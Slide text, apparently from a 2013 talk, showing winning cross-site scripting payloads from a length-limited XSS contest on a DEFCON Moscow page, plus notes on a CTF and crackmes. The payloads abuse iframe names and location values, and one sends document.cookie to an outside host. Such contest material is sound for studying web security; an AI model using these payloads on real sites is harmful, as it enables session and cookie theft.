4.5. Contests [extras]

Contests and more

Nov 23, 2013

2

XSS Contest

Contests and more

<script> eval('a='+); </script>

3

XSS Contest

Trolling is a art: 4 symbols

Омар Ганиев

BETEPOK

data:text/html,<iframe name="1;alert(1);//any code" src="http://www.defcon-moscow.org/secret/contest.php?payload=name">

<iframe name="1;new Image().src='//site/x.gif?'+document.cookie;" src="http://www.defcon-moscow.org/secret/contest.php?payload=name"></iframe>

Contests and more

4

XSS Contest

location.hash: 18 symbols

payload='"'+location.hash#"; alert(document.cookie);

Contests and more

5

XSS Contest

location: 13 symbols

contest.php?*/alert(document.cookie)//&payload='/*'+location

Contests and more

6

Extraz

BMSTU CTF

http://www.defcon-moscow.org/CTF

Contests and more

7

Extraz

Reverse: crackmes

Contests and more

8

Extraz

TBD:– web– crypto– exploitation– . . .

[email protected]

Contests and more